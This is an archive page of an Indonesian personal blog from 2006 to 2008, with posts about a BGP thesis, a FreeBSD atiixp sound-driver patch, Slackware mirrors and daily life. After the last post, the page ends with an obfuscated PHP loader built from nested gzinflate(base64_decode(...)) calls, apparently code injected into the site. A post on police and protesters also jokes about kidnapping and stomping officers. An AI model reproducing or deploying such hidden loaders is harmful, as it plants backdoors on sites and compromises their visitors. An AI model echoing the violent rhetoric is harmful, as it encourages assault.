Delicious

Archives

Categories

Archive for 'Kuliah' Category





« »

Lucky Bastard

  ozzie / 18/11/2008

Mungkin gw emang bajingan yang cukup beruntung :D.. dengan pola hidup yang acak-acakan 8-} dan pemikiran yang Nggak Bangettt… ;))

Terispirasi dari quote di PDA salah satu abang gw :">:">

Gagal MeRencanakan berarti MeRencanakan keGagalan

Alhamdulillah [-o< [-o< [-o< Atas berkat Rahmat Allah SWT.. cita-cita gw selama 4 bulan terakhir udah ter-Realiasai <:-p<:-p

Dari mulai Kuliah yang udah selesai\:d/\:d/.. dengan embel-embel title di belakang nama:"> ditambah Ijazah yang Sangat Memuaskan dengan tugas akhir membahas BGP :D.. dengan grade yg lumayan lah untuk kelas mahasiswa bego kayak gw :">.. dan beberapa sertifikat RDBMS, Networking dan Linux dari Informatics sebagai lembaga sertifikasi:D… dan InsyaAllah [-o<[-o< rencana kedepan akan mengikuti wisuda pada bulan desember mendatang<:-p.. dan InsyaAllah jika ada Rezeky akan meneruskan Sekolah Lagih[-o<.. biar gak gampang di Bego – in .. :)>-

Ngebangun motor kenceng ;));)).. dengan total pengeluaran yang ampir setara dengan harga motor nya:)):)).. dan InsyaAllah akan di-ikut sertakan dalam event balap resmi maupun tidak resmi (Liaran :red) 8-}.. dan InsyaAllah tahun depan mencari pengganti si Item buat harian:-s.. maklumlah.. Kerjaan Gak Jelas 8-}8-}

Telah memiliki barcode dan tergabung sebagai Anggota Inti<:-p<:-p.. dan ikutan belajar berorganisasi:">:">.. walupun untuk sekarang hanya baru bisa ikut berkontribusi dalam dunia maya8-| sebagai donatur infrastruktur website (SSFC) :D:D… Moga-moga jiwa sosial gw gak ketinggalan [-o<[-o< maklum.. secara gw Kurang Gaol ;))

Penyakit gw udah sembuh tanpa harus melewati operasi<:-p.. dengan menggunakan ramuan tradisional :D :D.. ternyata Mujarab;)

Mungkin rencana kedepan masih banyak.. memperbaiki kinerja:-s… meningkatkan knowledge:"> maen OpenSource lagi:D.. membangun infrastruktur bengkel[-o<.. belajar mikir8-}..



Next Round…

  ozzie / 12/08/2008

12-08-80 (kayak password orang yang ulang taon 8-} )..

Finally.. #:-s Alhamdulillah [-o<[-o<[-o< Sebagai mahasiswa Bego:-s. Usaha gw selama ini bisa berakhir 8-} .. Skripsi gw dah lulus sidang <:-p.. dengan judul “Implementasi Multihoming dengan BGP:">:"> walaupun nunggu dari pagi.. mana udah keren banget pake almamater segala 8-} tapi kebagian urutan nomer sidang 10 #:-s.. makasih buat para dosen pembimbing dan penguji ternyata sangat Mudah.. :">:">.. tinggal revisi ama tutup study \:d/\:d/\:d/ (kalo kata om Bryan Adams – Best day of my life 8-})..

Saatnya Celebration.. tapi 8-|.. masih berkabung menghadapi si-Anjing yang gak bisa di percaya.. :-<

Siap-siap menghadapi dan mengacak-acak musuh baru di dunia nyata :D:D.. (Kalo maren kan di dunia maya ;));)) ).. waktunya Ranger Biru beraksi <:-p<:-p

So… Don’t F*ck with Me… Let’s See.. What Next? :>:>



atiixp on FreeBSD 4.11

  ozzie / 24/07/2008

Berhubung sekarang (juli 2008) lagi pake laptop Acer TravelMate 2000:D.. dan beresin skripsi dan persiapan sidang tentang BGP:">:">.. dan kebetulan Simulator yang support BGP nya pake IMUNES dan jalan di FreeBSD 4.11.. jadi install FreeBSD 4.11-RELEASE di laptop deh.. #:-s#:-s

untuk hardwarenya sih support semua di FreeBSD 4.11.. tapi cuman soundcard doang yang gak ke detect :-s:-s .. jadi gagu dah:((:((.. ternyata ni laptop pake chipset ATI#-o.. selidik punya selidik.. ternyata atiixp baru muncul di release 6.1(snd_atiixp) =((=((

daripada gagu nih laptop dan demi dengerin progressive rock:-<.. akhirnya pake cara yang lumayan kejam dah \:d/\:d/. copy source dari http://people.freebsd.org/~ariff/ walaupun cuman ada buat FreeBSD 5 & 6.. ;));)).. setelah pelajari source dan depedensinya dan edit sana-sini disesuaikan dengan PCM untuk release 4.x … akhirnya bisa nyanyi juga nih laptop <:-p<:-p<:-p ..

* Rock ‘n Roll All Nite \:d/\:d/\:d/\:d/

Struktur file nya bisa di liat di http://www.delphij.net/fbdoxy/dev_sound/html/d7/dae/atiixp_8c.html

Patch buat atiixp.c nya bisa di sedot di: http://net.ozzie.web.id/pub-ozz/diff/atiixp.c.diff

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
--- atiixp.cFri Jul 25 10:32:00 2008
+++ atiixp.c.ozzFri Jul 25 10:32:46 2008
@@ -56,8 +56,8 @@
 #include <dev /sound/pcm/sound.h>
 #include </dev><dev /sound/pcm/ac97.h>
 
-#include </dev><dev /pci/pcireg.h>
-#include </dev><dev /pci/pcivar.h>
+#include <pci /pcireg.h>
+#include </pci><pci /pcivar.h>
 #include <sys /sysctl.h>
 #include </sys><sys /endian.h>
 
@@ -65,6 +65,8 @@
 
+#define ATI_IXP_DEFAULT_BUFSZ 16384
+
 struct atiixp_dma_op {
 volatile uint32_t addr;
 volatile uint16_t status;
@@ -521,7 +523,7 @@
 uint32_t addr, blksz;
 int i;
 
-addr = sndbuf_getbufaddr(ch->buffer);
+addr = vtophys(sndbuf_getbuf(ch->buffer)); 
 blksz = sndbuf_getblksz(ch->buffer);
 
 for (i = 0; i < ch->dma_segs; i++) {
@@ -586,7 +588,7 @@
 uint32_t addr, align, retry, sz;
 volatile uint32_t ptr;
 
-addr = sndbuf_getbufaddr(ch->buffer);
+addr = vtophys(sndbuf_getbuf(ch->buffer));
 align = (ch->fmt & AFMT_32BIT) ? 7 : 3;
 retry = 100;
 sz = sndbuf_getblksz(ch->buffer) * ch->dma_segs;
@@ -744,7 +746,10 @@
 /* wait for the interrupts to happen */
 timeout = 100;
 while (--timeout) {
-msleep(sc, sc->lock, PWAIT, "ixpslp", 1);
+/*msleep(sc, sc->lock, PWAIT, "ixpslp", 1); */
+atiixp_unlock(sc);
+DELAY(1000);
+atiixp_lock(sc);
 if (sc->codec_not_ready_bits)
 break;
 }
@@ -816,8 +821,7 @@
 pcm_addchan(sc->dev, PCMDIR_REC, &atiixp_chan_class, sc);
 
 snprintf(status, SND_STATUSLEN, "at memory 0x%lx irq %ld %s", 
-rman_get_start(sc->reg), rman_get_start(sc->irq),
-PCM_KLDSTRING(snd_atiixp));
+rman_get_start(sc->reg), rman_get_start(sc->irq));
 
 pcm_setstatus(sc->dev, status);
 
@@ -882,7 +886,8 @@
 if (vendor == atiixp_hw[i].vendor &&
 devid == atiixp_hw[i].devid) {
 device_set_desc(dev, atiixp_hw[i].desc);
-return BUS_PROBE_DEFAULT;
+/*return BUS_PROBE_DEFAULT; */
+return 0;
 }
 }
 
@@ -968,7 +973,6 @@
 /*highaddr*/BUS_SPACE_MAXADDR,
 /*filter*/NULL, /*filterarg*/NULL,
 /*maxsize*/sc->bufsz, /*nsegments*/1, /*maxsegz*/0x3ffff,
-/*flags*/0, /*lockfunc*/NULL,
 /*lockarg*/NULL, &sc->parent_dmat) != 0) {
 device_printf(dev, "unable to create dma tag\n");
 goto bad;
@@ -981,7 +985,6 @@
 /*maxsize*/sc->dma_segs * ATI_IXP_NCHANS *
 sizeof(struct atiixp_dma_op),
 /*nsegments*/1, /*maxsegz*/0x3ffff,
-/*flags*/0, /*lockfunc*/NULL,
 /*lockarg*/NULL, &sc->sgd_dmat) != 0) {
 device_printf(dev, "unable to create dma tag\n");
 goto bad;
@@ -1127,5 +1130,5 @@
 };
 
 DRIVER_MODULE(snd_atiixp, pci, atiixp_driver, pcm_devclass, 0, 0);
-MODULE_DEPEND(snd_atiixp, sound, SOUND_MINVER, SOUND_PREFVER, SOUND_MAXVER);
+MODULE_DEPEND(snd_atiixp, snd_pcm, PCM_MINVER, PCM_PREFVER, PCM_MAXVER);
 MODULE_VERSION(snd_atiixp, 1);
 
</sys></pci></dev>
# cd /usr/src/sys/dev/sound/pci/
# wget http://people.freebsd.org/~ariff/test/atiixp.h
# wget http://people.freebsd.org/~ariff/test/atiixp.c
# wget http://net.ozzie.web.id/pub-ozz/diff/atiixp.c.diff
# patch < atiixp.c.diff
Hmm...  Looks like a unified diff to me...
The text leading up to this was:
--------------------------
|--- atiixp.c   Fri Jul 25 10:32:00 2008
|+++ atiixp.c.ozz       Fri Jul 25 10:32:46 2008
--------------------------
Patching file atiixp.c using Plan A...
Hunk #1 succeeded at 1.
Hunk #2 succeeded at 56.
Hunk #3 succeeded at 65.
Hunk #4 succeeded at 523.
Hunk #5 succeeded at 588.
Hunk #6 succeeded at 746.
Hunk #7 succeeded at 821.
Hunk #8 succeeded at 886.
Hunk #9 succeeded at 973.
Hunk #10 succeeded at 985.
Hunk #11 succeeded at 1130.
done


BGP Simulator

  ozzie / 10/07/2008

Bab 5 udah selesai.. tinggal acc Sidang [-o<[-o<[-O<

sekian lama googling mencari Network Simulator yang support BGP.. akhirnya dapet juga: IMUNES <:-p<:-p.

Dari Sekian banyak Network Simulator seperti: Boson NetSim, Packet Tracer, dynamips, dll.. Kayaknya baru IMUNES yang bisa advertise IP :) (CMIIW) .. lumayanlah..:">:">.. dari pada harus bawa-router waktu sidang ;)) sedangkan prototype ama konsepnya lumayan ribet.. minimal kalo di itung-itung butuh 9 router yang support BGP.. minimal Cisco 3600.. kalo pake pc-based lebih capek lagih8-}.. kudu install router engine dulu..

Sayangnya inih IMUNES running di FreeBSD 4.11-RELEASE. bantai dulu deh Slackware di laptop :">:">



Mahasiswa VS Polisi.

  ozzie / 31/05/2008

bentar l-) gi ngumpulin bahan2.. l-) soale gw jg masih mahasiswa.. :>

hmmm..:-?:-?.. masih anget-angetnya masalah BBM8-|… pada ngeliat kan pemberitaan di media??:>.. gimanah anarkis nya para penegak hukum republik indonesia tercinta ini?.. dari semenjak lengsernya orde baru develop nya presiden RI ke 2 SOEHARTO (RIP).. gi ngapain yak beliau?? 8->8->.. konser bareng jimmy hendrix, janis joplin, kurt cobain kali..8-}8-}..

Mengapa setiap demo selalu berakhir rusuh??? :-/:-/.. karena para pedemo (Mahasiswa, buruh, dan rakyat..) ingin aspirasinya di dengerin jing..:-w:-w.. pada budek kali wakil rakyat dimari.. ;));));)).. mentang-mentang udah punya jabatan.. :-<:-<:-<.. intinya cuman itu… lalu mengapa selalu bentrok dengan Aparat Keparat??.. :-/.. karena meraka berusaha menghalang-halangi dan menghambat gerak dari pen-demo dalam menyuarakan aspirasinya…

mungkin kalo Penegak hukum di negara ini ngerti gak bakalan terjadi bentrok.. 8->8->8->.. merasa bangga di balik seragam kolekan rakyat :-&:-&:-&.. dan berdalih mengamankan.. tai.com =))=))=))… dan berani nya gerombolan dalam regu.. :-j:-j:-j lemahh… culik aja kalo lagi sendirian;));)).. injek-injek <:-p<:-p<:-p (inget tragedi Trisakti dan era Reformasi;));)).. aparat pake kostum loreng-loreng dan polisi jatoh dalam usaha mengamankan diri8-}8-}8-}.. hingga di injek-injek oleh rakyat, mahasiswa dan di pukulin pake tongkatnya sendiri 8-}8-} senjata makan tuan =))=))=))=)).. mamposs 8-}8-}.. makanya jangan berani nya kalo megang senjata doang 8-}8-}.. untung gak di tembak di tempat tuh aparat;));)).. giliran mahasiswa di babi buta pake peluru…:-s:-s siapa yg anarkis??? :-/ ) dan hingga akhirnya.. meng kambing hitamkan mahasiswa yang melakukan aksi anarki #-o#-o

kalo polisi sih udah ketauan kayak eek … =))=))=)) gak yang polantas.. ampe yg bener-bener binatang …

kayak liriknya Anti-Military:
“Aparat keparat.. Militer Bangsat… Polisi.. Anjing Tai Kucing”

mungkin yg pernah demo… tau lagu itu ;));));))

mungkin segituh ajah.. dengan melihat fakta di lapangan dan media massa… dan sebagai rakyat yang di bungkam oleh pembelaan para pejabat negara.. dengan dalil prosedur penegak hukum.:-s:-s Piss aahh :)>-:)>-



2008

  ozzie / 01/01/2008

taon 2007 udah liwat :-h:-h:-h….

alhamdulillah udah ada peningkatan [-o<[-o<[-o< dari segi sosial, ekonomi, budaya.. ;));))
harapannya taun 2008 bisa lebih :

  • dewasa [-o<
  • bertanggung jawab [-o<
  • nambah pahala[-o<
  • kurangin dosa [-o<
  • sabar :">:">
  • sayang :X:X
  • rajin nabung :D
  • konsen di skripsi 8-}
  • nambah income \:d/\:d/<:-p
  • majuin komunitas opensource :D
  • nambah ilmu:D
  • sigap baca sikon 8-}
  • manpaatin peluang :D
  • ngatur pola tidur, makan & istirahat :D
  • ngatur waktu \:d/
  • ……
  • ……
  • ……
  • HOT & Tokcerrrrr ;));));));))
  • Oiyah #-o#-o#-o lebih kenceng ;));)) [nutup PAIR, ganti CDI, Coil, Karbu + exhaust 8-}]
  • and then Flexible :)>- :D

8->8-> mungkin segituh dulu wish list nya [-o<[-o<[-o<

But this time I think… It’d be better if I ….. 8->8->



My New Hair..

  ozzie / 17/10/2007

Keasikan nongkrong lagih ;));)) begadang di pinggir jalan 8-}8-}
Nge-Gimbal-in rambut mumpung udah panjang \:d/\:d/\:d/
Rambut baru Abis lebaran <:-p<:-p<:-p<:-p<:-p

Ozzienich

Mo liat Koleksi Rambut Ozzie ??? ;;);;)

Makasih buat semua yg nongkrong di Ex. Studio ASA & warnet GAMMA ;));)) ;)

 

* No Matter what they Say!! :-":-":-"
Gak Suka?? :>:>:> Lo Siape??? 8-}8-}8-} Berantem yuk? >:/>:/>:/



Mirror-Slackware

  ozzie / 02/09/2007

Berawal dari kebutuhan.
Dikarenakan Doyan maen, ngoprek slackware, akhirnya server-server banyak yg menggunakan slackware ;));));)). dengan kebutuhan server dalam melakukan update, lalu me-Mirror iso dan packages. guna mempermudah dalam mendapatkan iso dan packages. dan menghemat bandwidth internasional. :D

1. mirror.slackware-id.org
Thx buat om budi yg udah minjemin subdomain ;))
mesin ini berada di Gedung Cyber dan terhubung dengan kapasitas 100Mbps melalui OpenIXP dan IIX.

Mirror Slackware

2. slackware.linux.or.id
Thx buat om ronny yg udah minjemin subdomain ;))
mesin ini berada di sebuah perumahan di kawasan Bekasi [Taman Bougenville] dengan NOC disamping kolam renang :D

3. kebonbinatang.org
mesin ini berada di kolong kasur ane :">:"> :D dengan kapasitas storage 160 GB. dan maksimum koneksi dibatesin cuma 3 Mbps :P:P.. maap ^:)^ ane juga kan mo monitoring & main game :P:P nanti jadi nge-lag gimanah? :-??

disamping iso ada beberapa source yg bermanpaat :D:D.. ijo-ijo dong gan ;));))



Entahlah

  ozzie / 02/05/2007

ga Tau kenapa.. :-??:-?? jadi sering keluar rumah:-?… doyan main + nongkrong lagi :-s.. balik pagi terus:((
padahal bikin skripsi belon selesai :(( kerjaan + project masih banyak :(( helppp!!! kena denda project lagi dahh =((=((
gw pengen kyk dulu lagi :((:((:(( CLEAR CMOS kali ya :-??:-?? lupakan



Jakarta-Kota-Tua

  ozzie / 03/04/2007

Sering banget dapet pertanyaan “Kuliah dimana sihh looo?;)) mEmang penting ya??? :-/:-/ mungkin gw gak pernah mau jawab/cerita :P:P:P. soalnya menurut gue sama aja kuliah dimana2 ;)) tergantung NIAT ama TEMEN MAIN dan tampang dosen =))=))8-}… gak ngaruh mao di Negeri ato Swasta… ato yang ber-MEREK yang katanya proses masuknya susah 8->8-> tapi gue gak tertarik tuh ;)), dan berhubung gue masih jadi mahasiswa dan mungkin Bapak-bapak/Ibu-ibu yang pernah ngalamin masa Kuliah???? :>:> pasti tau dong kelakuan mahasiswa/i yg bisa dapet nilai GEDE dengan GPA yang WOW8->8-> hingga dapet beasiswa segala :-s:-s, tapi kalo Skill diadu…. 8-}8-}8-} jadi LOYO=))=))=)) … dan kurikulum, silabus, menu yang udah BASI.. dan birokrasi beberapa Perguruan Tinggi yg sok DISIPLIN #-o#-o.. maap ^:)^ ^:)^ buat para ABG-ABG yang masih doyan ngikutin Mode, para Ayam kampus yang Sok MAHAL (liat standar harga di luar dong :)) ), para pecandu, pemakai, pengedar dan pemasok ;)) bukan maksud melecehkan cita-cita :D :-t hallahhh :-j:-j:-j …. pokoknya kalo mo Nyari dari stasiun jakarta kota (beos), gak jauh jaraknya :D dan sepanjang jalan banyak dihiasi bangunan-bangunan tua jaman dulu yang masih kokoh tak terawat. :-s
Jakarta Kota
Jakarta Kota
yang ini di seberang stasiun kota, depan/samping musium bank mandiri.

Jakarta Kota
lalu ketemu jl. kali besar.. tapi sangat disayangkan kondisi (Warna, Bau) kalinya sangat memprihatinkan :-s:-s… tapi kalo malam rame para JABLAY ;)) murah-murah kok :>:>
(tapi belon termasuk harga buka kamar ;)) )..

Jakarta Kota
setelah nyebrang ada perempatan yg menuju Telkom Kota.


Jakarta Kota
ini daerah terminal kota tua…. yg dulu katanya tempat VOC jualan.. [jualan apa nyari jablay?? :-?? :-?? ]

Jakarta Kota
ini di musium fatahillah.. tiap sore biasa nongkrong disini. cukup rame pengunjung nya dari lokal maupun internasional. apalagi kalo ujian kebagian jatah malem, pasti nongkrong di sini sambil menunggu waktu ujian dan menunggu kereta malam, sekalian main billiard di depan musim samping kantor pos kota. cukup aman kok disini,<:-p<:-p<:-p walaupun aksi premanisme masih ada ;).. Tapi ntu semua tergantung pengunjung =))=))=))



“Withheld”

  ozzie / 01/04/2007

FYI:
:-":-":-" mao ampe ribuan kali nge-call kek, KAGAK BAKALAN GUE ANGKAT;)) ;)) So..! [-x[-x jangan pernah nelpon gue pake fasilitas “Private Number” ato acara ngumpetin nomer segala ;)

Jadi.. maap aja kalo telpon gak diangkat:-s, coba periksa dulu ;));));)) peace.. >:)>:) Heheheheh……. :-h:-h



Tugas Akhir

  ozzie / 26/03/2007

Bismillahirohmanirohim [-o<[-o<[-o< persiapan nulis tugas akhir.. cari-cari judul :-s mana administrasi harus lengkap #:-s#:-s. Mao pinter kok Mahal:(… kerja keras terima project;)).. “Doakan Saya yaaa!(Gaya Benteng Takeshi)\:d/\:d/\:d/

Mohon maap kalo: gak pernah Online ^:)^, di Cuekin ^:)^, gak terima telepon ^:)^, gak bales SMS ^:)^. :-h:-h:-h gak maksud apa-apa kok ;)… cuma …..:-s :-s cuma beri o.z kesempatan buat coba bahagiakan kedua orang tua, keluarga [-o< dan cita-citaku :">:"> dari hasil usahaku selama ini ^:)^ ^:)^..



Protected: LCD laptop-ku.

  ozzie / 11/12/2006

This post is password protected. To view it please enter your password below:



PERANG CS !!!!!

  ozzie / 28/09/2006

:D

Telah di sediakan Server CS di :
202.154.177.26:27015 [Kacung Bandwidth] nunggu Sahur: biasa rame malam hari sekalian monitoring trafic ama nunggu saur :D

202.154.177.26:27016 [Kacung Bandwidth] nunggu Magrib:biasanya siang hari = deathmacth :D

buat seluruh crew Subnet, operator ISP, operator Warnet, semua kacung bandwidth…. silahkan gabung… sekedar melampiaskan unek2, kesel, nafsu, gairah… ama upstream provider-nya.. =))

** dilarang main dengan DUID dan dengan perasaaan DENDAM.. karena itu dilarang oleh Agama dan Negara, sesuai dengan UUD1945 =))



Guitalele…

  ozzie / 17/08/2006

Setelah lama tidak bermain gitar dikarenakan sibuk kerja+kuliah dan kondisi semua gitar sudah memperihatinkan, ada yang neck-nya patah, pecah, suaranya gak jelas :( akhirnya ozzie membeli gitar baru :D Yamaha seri GL-1 untuk menambah koleksi gitar dan semakin semangat main classical guitar-nya. :D
GL-1
Tapi sayang posisinya terlalu dekat dan sempit :( harus adaptasi dulu, maklum udah lama gak pegang gitar :D untuk tempo yang lambat sih masih dapet seperti Cavatina :D tapi kalo yang dinamik + tempo nya cepet seperti Canarios, Asturias, Bouree AMPUN :(( apalagi Recuerdos de la Alhambra…..

sekalian untuk menemani monitoring trafic dan me-Ngoprek Linux + BSD di kamar :D apalagi kalo nungguin compile kernel. :D



Rambut Ku!!!!!!!

  ozzie / 03/08/2006

Rambutku!!

menjelang Presentasi dengan orang Deperindag, terpaksa rambutku harus di potong :((



Jayakarta-Gondangdia-Tebet-Senen

  ozzie / 04/07/2006

Waspada copet di sekitar stasiun Jayakarta-Gondangdia :D
umumnya mereka beroperasi sekitar 3-6 orang. dan modus yang dilakukan sangat klasik, yaitu berdiri di pintu, dan setelah kereta jalan mereka melancarkan aksinya dengan menjambret HP, kalung, tas penumpang yang berada di sekitar pintu & jendela. setelah dapat mereka loncat ke peron setelah laju kereta mulai kencang.
sama seperti yang di lakukan tukang totok di sekitar stasiun Lenteng Agung dan stasiun Cawang. :))

Lain halnya dengan kawasan senen. para copet mudah di kenali dengan menggunakan kemeja, namun kancing pertama terlepas :D

untuk kawasan Tebet ada seorang bapak2. setiap pagi membawa koran, dan naik kereta pertama sekitar pukul 06:15 dari arah tanah abang, dan dia naik ke arah bogor. tapi beliau turun di Lenteng Agung. dan pindah menuju arah Jakarta-Kota. karena jam segitu sedang penuh2 nya orang berangkat kerja. dan dia berpura2 sebagai penumpang di dalam kereta.

WASPADALAH=)) =)) =)) WASPADALAH
*penelitian dilakukan selama 3 Minggu, namun daerah stasiun gondangdia-Jayakarta yang frekuensi kejadiannya sangat besar.



BEM ?????

  ozzie / 28/02/2006

Akhirnya masih ada yg percaya ma gw. <:-p tahun ini kepilih jadi pengurus BEM, kebetulan katanya jadi “Menteri” , padahal gak pernah nyalonin, ;)) emang sih petualangan ozzie lebih ke LINUX dibanding mereka yang katanya pencinta alam.
pokoknya ntar semua mahasiswa ozzie racunin linux deh :d



Lagi UAS

  ozzie / 07/02/2006

Pengen Belajar buat UAS tapi mallez



".gzinflate(base64_decode(gzinflate(base64_decode(gzinflate(base64_decode('BcHRdkMwAADQD/KgS0mzR8ShjSMJNWveEEamOGljab9+9+KOSbyef5IA89DREZ+phxlyKhQ2sF/pt2hxFtPHwFYI4J1+mVr7YRsVICLl0fQMYyzzvW8FIOGbX1PVUVAP0/uWuZs8RWoEcMl8XpKEe37FrPxw/eeNGNw19npJt8S5uOlh83I2wUDpI6btM7hPv0s8Idtwt7XVp6gqMz92VSRz6Zx7WFuuSb8YAk8IveQfQ69xi7kGBRCNSsZSDPl+CP4B'))))))); ?>